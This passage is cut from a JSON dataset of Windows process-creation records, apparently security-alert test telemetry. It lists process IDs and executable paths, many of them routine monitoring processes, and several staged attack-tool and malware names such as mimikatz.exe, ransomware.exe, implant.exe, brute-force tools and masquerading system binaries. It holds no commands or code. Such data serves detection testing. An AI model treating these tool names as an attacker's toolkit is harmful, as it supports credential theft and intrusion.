1500\",\"0x1514\",\"0x1534\",\"0x154c\",\"0x1490\",\"0x1464\",\"0x142c\",\"0x14b0\",\"0x14c0\",\"0x14fc\",\"0x14f0\",\"0x14e8\",\"0x152c\",\"0x1520\",\"0x1514\",\"0x1550\",\"0x1560\",\"0x1584\",\"0x1580\",\"0x15c0\",\"0x1600\",\"0x15f0\",\"0x162c\",\"0x166c\",\"0x1660\",\"0x1658\",\"0x169c\",\"0x168c\",\"0x16c8\",\"0x1560\",\"0x158c\",\"0x15d0\",\"0x15c8\",\"0x15ec\",\"0x15e8\",\"0x1630\",\"0x1668\",\"0x1658\",\"0x1664\",\"0x16d4\",\"0x16c0\",\"0x1704\",\"0x16fc\",\"0x11cc\",\"0x99c\",\"0x11c4\",\"0xd14\",\"0xaa8\",\"0x138c\",\"0xa60\",\"0xab8\",\"0xfbc\",\"0x1380\",\"0x5cc\",\"0x16f4\",\"0x1770\",\"0x1774\",\"0x1728\",\"0x1798\",\"0x1758\",\"0x17a8\",\"0x17f8\",\"0x17cc\",\"0x1414\",\"0x28c\",\"0xc18\",\"0x1404\",\"0x147c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x15b8\",\"0x15d0\",\"0x158c\",\"0x1638\",\"0x1624\",\"0x1628\",\"0x1654\",\"0x169c\",\"0x1694\",\"0x16c4\",\"0x1724\",\"0x1744\",\"0x1758\",\"0x1778\",\"0x178c\",\"0x17ac\",\"0x17bc\",\"0x17c0\",\"0x17dc\",\"0x17e4\",\"0x1440\",\"0x1434\",\"0x1424\",\"0x123c\",\"0x240\",\"0x1040\",\"0x690\",\"0x11ac\",\"0xd04\",\"0xc18\",\"0x13e4\",\"0x10e4\",\"0x90c\",\"0xfbc\",\"0xbdc\",\"0x57c\",\"0x10fc\",\"0xd78\",\"0x1054\",\"0x12dc\",\"0xb8\",\"0x11b4\",\"0x1020\",\"0xd80\",\"0xbdc\",\"0x690\",\"0x6d4\",\"0x54c\",\"0x93c\",\"0x138c\",\"0x1258\",\"0xf94\",\"0x123c\",\"0x11e4\",\"0xa08\",\"0x125c\",\"0x10f4\",\"0x1020\",\"0x638\",\"0x10cc\",\"0x107c\",\"0x1064\",\"0x1220\",\"0x1258\",\"0xab8\",\"0xbd8\",\"0x123c\",\"0xcd8\",\"0xd14\",\"0xa10\",\"0x1298\",\"0xac4\",\"0x364\",\"0x1128\",\"0xc54\",\"0x12e8\",\"0x17fc\",\"0x17f0\",\"0x1434\",\"0x1404\",\"0x13a4\",\"0x10f4\",\"0x11e8\",\"0x364\",\"0xc08\",\"0x338\",\"0xfbc\",\"0x640\",\"0x1320\",\"0x13b0\",\"0x1388\",\"0x11c8\",\"0x544\",\"0x894\",\"0xde8\",\"0x778\",\"0x2f8\",\"0x364\",\"0x1c4\",\"0x99c\",\"0x10c8\",\"0x13e0\",\"0x1550\",\"0x15d0\",\"0x13b4\",\"0x16d0\",\"0x11a8\",\"0x244\",\"0x1050\",\"0x690\",\"0xb8\",\"0x1364\",\"0x1148\",\"0x10e0\",\"0x12fc\",\"0x5cc\",\"0x518\",\"0xf84\",\"0xd64\",\"0xc18\",\"0xb50\",\"0x10a4\",\"0x13b4\",\"0xe3c\",\"0xd64\",\"0xc18\",\"0x10e0\",\"0x108c\",\"0x28c\",\"0x11b4\",\"0xddc\",\"0xbe8\",\"0x130c\",\"0x1040\",\"0x1370\",\"0x8e4\",\"0x10fc\",\"0x1298\",\"0x7f8\",\"0xf94\",\"0xc18\",\"0xa84\",\"0x1348\",\"0xe34\",\"0x11b4\",\"0x13b4\",\"0x1148\",\"0xde8\",\"0xc08\",\"0x1338\",\"0xb8\",\"0x6d4\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 